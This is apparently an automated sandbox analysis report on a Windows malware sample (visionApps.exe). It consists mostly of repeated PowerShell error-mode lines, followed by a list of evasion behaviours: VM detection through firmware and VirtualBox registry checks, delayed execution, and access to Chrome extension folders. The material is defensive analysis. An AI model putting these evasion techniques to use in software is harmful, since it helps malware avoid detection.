        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Query firmware table information (likely to detect VMs)
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSystem information queried: FirmwareTableInformation
        Tries to delay execution (extensive OutputDebugStringW loop)
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeSection loaded: OutputDebugStringW count: 1946
        Tries to detect sandboxes / dynamic malware analysis system (registry check)
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9926Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9910Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 407Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeWindow / User API: threadDelayed 9274Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe TID: 8520Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe TID: 8524Thread sleep time: -71500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exe TID: 8520Thread sleep time: -9274000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\App_86026\visionApps.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
